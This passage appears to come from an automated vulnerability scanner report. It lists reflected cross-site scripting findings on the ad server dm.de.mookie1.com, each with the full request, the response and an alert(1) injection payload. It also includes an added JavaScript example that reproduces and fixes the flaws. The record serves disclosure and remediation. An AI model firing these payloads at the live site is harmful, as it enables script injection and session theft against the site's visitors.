Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&ce89c"-alert(1)-"0f77d02c603=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.364. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77a4b"><script>alert(1)</script>888645203e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM77a4b"><script>alert(1)</script>888645203e6/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM77a4b"><script>alert(1)</script>888645203e6/2010DM/2132523159/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.365. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff67"><script>alert(1)</script>487596c05e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfff67"><script>alert(1)</script>487596c05e6/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfff67"><script>alert(1)</script>487596c05e6/1937657446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.366. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f5"><script>alert(1)</script>0795f99bb08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1394936567@x23b51f5"><script>alert(1)</script>0795f99bb08?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1658257177/x23b51f5"><script>alert(1)</script>0795f99bb08/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.367. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1466a"-alert(1)-"b3b7c22333a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3001466a"-alert(1)-"b3b7c22333a HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001466a"-alert(1)-"b3b7c22333a";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.368. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b11b1"-alert(1)-"34cc5b8ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b11b1"-alert(1)-"34cc5b8ecc=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2485
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b11b1"-alert(1)-"34cc5b8ecc=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.369. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1160"><script>alert(1)</script>c85ff46a2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMf1160"><script>alert(1)</script>c85ff46a2ce/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMf1160"><script>alert(1)</script>c85ff46a2ce/2010DM/1783622683/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.370. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69287"><script>alert(1)</script>33cb0a82ffa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM69287"><script>alert(1)</script>33cb0a82ffa/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM69287"><script>alert(1)</script>33cb0a82ffa/455163895/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.371. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f04"><script>alert(1)</script>7d4d4d5514e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1636403816@x2320f04"><script>alert(1)</script>7d4d4d5514e?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1858296443/x2320f04"><script>alert(1)</script>7d4d4d5514e/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.372. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40281"-alert(1)-"380d67eabc7 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_72840281"-alert(1)-"380d67eabc7 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72840281"-alert(1)-"380d67eabc7";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...
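The two reflection contexts in these dm.de.mookie1.com findings are different enough to need different fixes: 4.370 and 4.371 drop a URL path segment into a double-quoted HTML attribute (HREF) and 4.372 drops the whole query string into a double-quoted JavaScript string literal (var camp="..."). The following is an added example, not code from the report or from the ad server's own software. It reconstructs both renderings from the responses shown above (the function names and the templating are assumptions; the payloads are copied from findings 4.370 and 4.372), runs the generated script against a stub alert() to show that the reflected input executes as code, then shows a context-correct encoder for each case plus an allowlist check for these path segments (the permitted alphabet is an assumption drawn from the legitimate values seen in the requests).

```javascript
// Added example, not part of the original report. Reconstructs the two
// vulnerable renderings seen in findings 4.370-4.372 and their hardened forms.

// Scanner payloads copied from findings 4.370 (attribute context) and
// 4.372 (JavaScript string context).
const ATTR_PAYLOAD = '69287"><script>alert(1)</script>33cb0a82ffa';
const JS_PAYLOAD = '40281"-alert(1)-"380d67eabc7';

// Fixed prefix of the click URL as it appears in the responses.
const BASE = 'http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/';

// --- Vulnerable renderings (assumed templating, mirrors the report) ---

// A URL path segment is concatenated straight into a double-quoted HREF.
function renderClickLinkVulnerable(segment) {
  return '<A HREF="' + BASE + segment + '/x23/default/empty.gif?x" target="_top">';
}

// The raw query string is concatenated into a double-quoted JS string literal.
function renderCampScriptVulnerable(queryString) {
  return '<script>\nvar camp="' + queryString + '";\ncamp=camp.toUpperCase();\n</script>';
}

// --- Context-specific encoders ---

// HTML attribute context: entity-encode every character that can terminate
// the attribute value or the tag.
function encodeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// JavaScript string context: JSON.stringify escapes quotes and backslashes;
// additionally escape < > & so "</script>" can never close the block, and
// U+2028/U+2029, which are legal inside JSON but end a line in older JS engines.
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Defence in depth: the legitimate segments seen in the requests (B3DM,
// 2010DM, 1636403816@x23, USNetwork/RS_SELL_2011Q1_AOL_CPA_728) use a narrow
// alphabet (assumption), so reject anything outside it before rendering.
function isWellFormedSegment(s) {
  return /^[A-Za-z0-9_@.\/-]+$/.test(s);
}

// --- Hardened renderings ---
function renderClickLinkSafe(segment) {
  return '<A HREF="' + BASE + encodeHtmlAttr(segment) + '/x23/default/empty.gif?x" target="_top">';
}

function renderCampScriptSafe(queryString) {
  // encodeJsString supplies the surrounding double quotes itself.
  return '<script>\nvar camp=' + encodeJsString(queryString) + ';\ncamp=camp.toUpperCase();\n</script>';
}

// --- Checks ---

// The scanner's own criterion: is the payload present byte-for-byte?
function reflectsUnmodified(body, payload) {
  return body.includes(payload);
}

// Value of the HREF attribute as a browser would delimit it (up to the next
// double quote). If the attacker's quote closed it, the value is truncated.
function hrefValue(html) {
  const start = html.indexOf('HREF="') + 'HREF="'.length;
  return html.slice(start, html.indexOf('"', start));
}

// Execute the generated <script> body with a stub alert() and report whether
// the reflected input ran as code (vulnerable) or stayed data (hardened).
function runCampScript(html) {
  const js = html.slice('<script>\n'.length, -'\n</script>'.length);
  const calls = [];
  const result = { alertCalls: 0, camp: undefined, error: null };
  try {
    result.camp = new Function('alert', js + '\nreturn camp;')((x) => calls.push(x));
  } catch (e) {
    result.error = e.name; // the vulnerable script ends up with camp === NaN
  }
  result.alertCalls = calls.length;
  return result;
}
```

Running the script variant shows why the scanner rates this "Certain": in the vulnerable rendering the stub alert() fires once before camp.toUpperCase() throws on the NaN that the subtraction produced, while in the hardened rendering camp is simply the upper-cased input with the quotes still inside it. Note that the encoders are not interchangeable: entity-encoding does nothing inside a script block, and JSON-escaping does nothing inside an attribute, which is why the encoder has to be chosen per output context.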

4.373. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 906d8"-alert(1)-"52b95d4418a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&906d8"-alert(1)-"52b95d4418a=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
